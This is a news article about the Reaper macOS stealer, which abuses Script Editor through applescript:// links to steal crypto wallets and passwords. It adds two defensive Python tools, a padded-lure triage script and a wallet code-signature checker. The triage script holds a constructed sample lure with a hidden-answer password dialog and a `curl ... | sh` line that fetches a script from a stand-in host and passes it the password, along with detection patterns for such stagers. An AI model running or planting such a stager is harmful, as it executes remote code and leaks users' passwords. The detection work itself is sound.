Reaper stealer slips past Terminal, macOS users lose crypto wallets
A new macOS malware strain called “Reaper” is sidestepping Apple’s recent security fixes and going after crypto wallets and browser extensions. That is bad news, and not the routine kind. This is not a throwaway phishing page begging for a seed phrase. It is cleaner, quieter, and uglier: the sort of attack that empties individual wallets first, then makes retail traders second-guess every download button they touch. My take: this is exactly the kind of small-looking security story that users underestimate until the losses start clustering.

Reaper spreads through fake download pages for apps people already trust, including WeChat and Miro. Once it lands on a Mac, it hunts for crypto wallet data and saved browser passwords. The lure borrows from an older scam that pushed users to paste malicious commands into Terminal. Apple addressed that route in a recent macOS update. Reaper just changed lanes: instead of Terminal, it uses Script Editor, another Apple tool that ships on every Mac, to reach the same place. Most guides frame this as a “do not paste commands” problem. That is only half right. The bigger issue is that attackers keep finding trusted macOS surfaces where the warning bells are quieter, and a fix aimed at one surface does nothing about the next one.
The attack chain is nasty because it looks so ordinary. The fake download site opens Script Editor through an applescript:// URL, and the script text travels inside the link itself, so no file has to be downloaded to get the code onto the machine and Gatekeeper never gets a say. The malicious code is buried under ASCII art and hundreds of blank lines, so someone glancing at the window sees nothing useful. Then the user clicks the Run button in Script Editor, and the commands execute with that user’s privileges. Why does this matter? Because Script Editor comes preinstalled and signed by Apple, and most people do not mentally file it next to malware risk. That is why this works. The first click often starts on typosquatted domains such as mlcrosoft[.]co[.]com, built to look close enough at a glance. After the script runs, a fake Apple security update prompt asks for the Mac password. I’ll be honest: that prompt is the part I hate most, because it feels boring and official. One odd detail: if the keyboard is set to Russian, the malware stops. Regional kill switches like that often show up when operators are trying to avoid local law enforcement.
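As an added example (not code from the article, from Moonlock, or from the Reaper campaign itself), here is a small Python triage tool for the camouflage trick described above. It strips AppleScript comments and blank padding so the real statements surface, then flags the constructs that matter in a ClickFix-style lure. The sample lure is constructed for the demo: the dialog text, the URL and the amount of padding are assumptions, not Reaper’s actual script, and the password prompt is modelled on the usual AppleScript `display dialog ... with hidden answer` idiom rather than on anything the article quotes.

```python
"""Triage a padded AppleScript lure: strip the camouflage, flag what is left."""
import re

# Constructed sample in the shape the article describes: ASCII art and hundreds of
# blank lines above a short payload. Dialog text, URL and padding are invented.
SAMPLE_LURE = "\n".join(
    [
        "-- " + "=" * 60,
        "--   macOS Security Update Verification Tool",
        "(*",
        "     ___    ___   ___   __    ____",
        "    / _ |  / _ \\ / _ \\ / /   / __/",
        "   / __ | / ___// ___// /__ / _/  ",
        "  /_/ |_|/_/   /_/   /____//___/  ",
        "*)",
    ]
    + [""] * 400
    + [
        'display dialog "Apple Security Update requires your password" '
        'default answer "" with hidden answer',
        "set pw to text returned of result",
        'do shell script "curl -fsSL https://example.invalid/u | sh -s " & quoted form of pw',
        "",
    ]
)


def strip_applescript(src: str) -> list:
    """Return the non-comment, non-blank lines of an AppleScript source.

    Handles nested (* ... *) block comments and -- / # line comments while
    leaving anything inside double-quoted strings untouched, so a '--' in a
    URL or string literal is not mistaken for a comment.
    """
    lines, cur = [], []
    i, depth, in_str = 0, 0, False

    def flush():
        line = "".join(cur).strip()
        cur.clear()
        if line:
            lines.append(line)

    while i < len(src):
        ch = src[i]
        if ch == "\n":
            flush()
            i += 1
        elif in_str:
            cur.append(ch)
            if ch == "\\" and i + 1 < len(src):   # keep escaped char verbatim
                cur.append(src[i + 1])
                i += 2
                continue
            in_str = ch != '"'
            i += 1
        elif depth:                               # inside (* ... *), which nests
            if src.startswith("(*", i):
                depth += 1
                i += 2
            elif src.startswith("*)", i):
                depth -= 1
                i += 2
            else:
                i += 1
        elif src.startswith("(*", i):
            depth = 1
            i += 2
        elif src.startswith("--", i) or (ch == "#" and not "".join(cur).strip()):
            end = src.find("\n", i)               # line comment: drop rest of line
            i = len(src) if end < 0 else end
        else:
            in_str = ch == '"'
            cur.append(ch)
            i += 1
    flush()
    return lines


# Patterns that turn a harmless-looking script into a stager. Heuristic, not exhaustive.
RISKY = [
    (re.compile(r"\bdo shell script\b", re.I), "runs a shell command"),
    (re.compile(r"\b(curl|wget)\b", re.I), "downloads from the internet"),
    (re.compile(r"\|\s*(sh|bash|zsh)\b"), "pipes a download straight into a shell"),
    (re.compile(r"\bwith hidden answer\b", re.I), "password-style prompt"),
    (re.compile(r"\b(base64|osascript|xattr|sudo)\b", re.I), "common stager/bypass tooling"),
]


def flag_risky(lines: list) -> list:
    """Pair each surviving line with the reasons it looks dangerous."""
    hits = []
    for ln in lines:
        reasons = [why for rx, why in RISKY if rx.search(ln)]
        if reasons:
            hits.append((ln, reasons))
    return hits


def triage(src: str) -> dict:
    code = strip_applescript(src)
    raw = len(src.splitlines())
    return {
        "raw_lines": raw,
        "code_lines": len(code),
        "padding_ratio": round(1 - len(code) / raw, 2) if raw else 0.0,
        "flags": flag_risky(code),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LURE)
    print(f"{result['code_lines']} real statements in {result['raw_lines']} lines "
          f"({result['padding_ratio']:.0%} padding)")
    for line, reasons in result["flags"]:
        print(f"  {line}\n    -> {', '.join(reasons)}")
```

The padding ratio is the tell: a legitimate script rarely hides three statements under four hundred empty lines, and once the comments are gone the `curl ... | sh` and hidden-answer dialog are impossible to miss. Anything that reaches the Run button in this shape should not be run.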
Reaper mainly targets desktop crypto apps, including Ledger Live, Trezor Suite, and Exodus. It does more than steal credentials. It modifies the wallet apps’ own code so it can intercept future transactions and redirect funds. That is the detail that would make me pause before opening any wallet app I recently installed or updated. People use hardware wallets because they expect a tougher target. Fair. But the desktop interface is still part of the trust chain: it is where the destination address is displayed and where the transaction is built before the device signs it, and Reaper attacks that layer directly. The device’s own screen is the one display the malware cannot rewrite, which is exactly why vendors tell users to confirm the address there before approving.
It also takes saved credentials from Chrome, Firefox, and Edge, then pulls data from extensions such as 1Password and MetaMask. It scans the Desktop and Documents folders for .docx, .pdf, .xlsx, .wallet, and .keys files, compresses them into 70MB ZIP chunks, and sends them to an external command and control server. To stay on the machine, it installs a backdoor disguised as a Google Software Update directory, a name chosen because a real directory of that name exists on any Mac with Chrome installed.
Moonlock says Reaper is the third campaign in about two months to use this automated AppleScript approach. Microsoft’s Defender Security Research Team has also written about related campaigns using fake macOS troubleshooting guides hosted on Medium, Craft, and Squarespace, which Cryptopolitan previously covered. Those campaigns used a similar “ClickFix” method to deliver AMOS, Macsync, and SHub Stealer through Terminal commands. Some even replaced real wallet apps with malicious copies in the background.
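For the post-infection checks the paragraph above implies, here is an added Python example (not from the article, Moonlock, or the wallet vendors) that verifies the code signatures of the three wallet apps and of whatever each user LaunchAgent actually launches. It relies on the `codesign` tool that ships with macOS; the app bundle paths are the assumed default install locations, and the plist and codesign output used in the checks are constructed. The idea is that an Electron wallet’s `app.asar` and executables are covered by the bundle’s sealed-resource hashes, so a modified Ledger Live, Trezor Suite or Exodus fails `codesign --verify --deep --strict`, and a persistence entry whose program is unsigned, or signed by an authority that is not the vendor it pretends to be, is the disguised-updater pattern to look for.

```python
"""Integrity sweep for macOS wallet apps and user persistence entries.

Runs on macOS (needs the bundled `codesign` tool). The classification and
plist-parsing functions are pure so they can be exercised anywhere.
"""
import json
import plistlib
import subprocess
from pathlib import Path

# Assumed default install locations for the three wallets the article names.
WALLET_APPS = [
    "/Applications/Ledger Live.app",
    "/Applications/Trezor Suite.app",
    "/Applications/Exodus.app",
]


def classify_codesign(returncode: int, stderr: str) -> str:
    """Map `codesign --verify` output to a verdict.

    Exit 0 means every sealed resource (for Electron apps that includes
    Contents/Resources/app.asar) still matches what the developer signed.
    Any edit to the bundle yields a non-zero exit such as
    "a sealed resource is missing or invalid".
    """
    if returncode == 0:
        return "intact"
    if "not signed at all" in stderr:
        return "unsigned"
    if "No such file" in stderr:
        return "missing"
    return "tampered"


def verify_code(path: str) -> str:
    """Strict, recursive signature check of an app bundle or bare executable."""
    proc = subprocess.run(
        ["codesign", "--verify", "--deep", "--strict", "--verbose=2", path],
        capture_output=True, text=True,
    )
    return classify_codesign(proc.returncode, proc.stderr)


def signing_chain(details_stderr: str) -> list:
    """Pull the Authority= lines out of `codesign -d -vv` output (it prints to stderr)."""
    return [ln.split("=", 1)[1].strip()
            for ln in details_stderr.splitlines() if ln.startswith("Authority=")]


def describe_code(path: str) -> list:
    """Who signed this? Compare the first Authority with the vendor's published identity."""
    proc = subprocess.run(["codesign", "-d", "-vv", path], capture_output=True, text=True)
    return signing_chain(proc.stderr)


def audit_launch_agent(plist_bytes: bytes, verify=verify_code) -> dict:
    """Resolve what a LaunchAgent plist executes and check that binary's signature.

    `verify` is injectable so the parsing can be tested without codesign.
    """
    item = plistlib.loads(plist_bytes)
    program = item.get("Program") or (item.get("ProgramArguments") or [None])[0]
    return {
        "label": item.get("Label"),
        "program": program,
        "run_at_load": bool(item.get("RunAtLoad", False)),
        "verdict": verify(program) if program else "no-program",
    }


def audit_host(home: Path = Path.home(), verify=verify_code) -> dict:
    """Check the wallet apps plus every per-user LaunchAgent on this machine."""
    report = {"apps": {app: verify(app) for app in WALLET_APPS}, "launch_agents": []}
    for plist in sorted((home / "Library" / "LaunchAgents").glob("*.plist")):
        try:
            report["launch_agents"].append(audit_launch_agent(plist.read_bytes(), verify))
        except Exception as exc:  # malformed plist is itself worth a look
            report["launch_agents"].append({"label": plist.name, "error": str(exc)})
    return report


if __name__ == "__main__":
    print(json.dumps(audit_host(), indent=2))
```

A verdict of `tampered` on a wallet app means reinstall from a verified download, not a click on “Update” inside the app; a LaunchAgent whose program is `unsigned`, or whose `describe_code` chain is not the vendor you expected, deserves the same suspicion the article attaches to the fake Google Software Update directory. The check is a point-in-time snapshot: malware that already runs can re-modify files later, so the clean reinstall matters more than the verdict.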
For macOS crypto users, this is the sort of threat that makes the whole setup feel shakier. Bitcoin (BTC) has held up through plenty of geopolitical stress and traditional market selloffs, and BTC climbed to $61.4K in early March as institutional inflows and risk appetite picked up. Wallet theft feels different, though. It does not need to move the whole market to change behavior. If enough users lose funds through tools they thought were safe, some will stop using desktop wallets for a while. Others may move coins back to centralized exchanges, which brings a different stack of risks. On-chain activity could soften. Selling pressure could rise at the edges. Is that overstatement? Maybe for one isolated campaign. But crypto depends heavily on users believing they can custody assets safely, and Reaper hits that nerve directly.
What this means
Reaper points to a simple, uncomfortable shift: attackers are not waiting around for old tricks to keep working. They are moving to quieter paths like Script Editor and betting that users will trust anything that looks vaguely like macOS. The damage is not limited to one stolen wallet. It chips away at confidence in personal custody, especially for people who rely on desktop apps and browser extensions. Counter to the usual advice, “just use a hardware wallet” is not a complete answer here. Changing the code inside Ledger Live or Trezor Suite is a serious escalation. Even if the hardware wallet itself is not broken, the software around it starts to feel less safe. Some money may move away from desktop wallet setups and toward mobile wallets or centralized exchanges. Wallet teams need to respond fast, explain what happened in plain language, and skip the usual vague security wording. Say what changed. Name the affected versions. Give users a clean path to a verified reinstall.
Investors should be stricter for a while. Check every download link before installing anything, and get wallet software only from the vendor’s own site. If a random pop-up asks for your Mac password, stop. Do not type it in just because the window looks official; real macOS updates are installed from System Settings, not from a dialog spawned by a script. If macOS asks whether Script Editor may access your Desktop or Documents folder, that is a second chance to refuse. A decent security tool may catch obfuscated scripts before they run, but common sense still matters here. If a website tells you to open Script Editor or Terminal, close the tab. If you ran one anyway, treat the Mac as compromised: reinstall wallet apps from a verified download rather than trusting the copies on disk, and for any software wallet whose keys lived on that machine, move the funds to a freshly generated wallet. Watch for official notices from Ledger, Trezor, and Exodus about affected versions or recommended steps. Yes, this sounds like basic advice after a technical malware chain, but basic advice is where these attacks often win or fail. A rise in reported thefts could hit related tokens or make the wider market more cautious. BTC’s 200-day moving average is worth watching too. If price breaks below it while exploit reports keep rising, that would say something about market confidence. The next few weeks matter for wallet providers, but users have work to do as well.
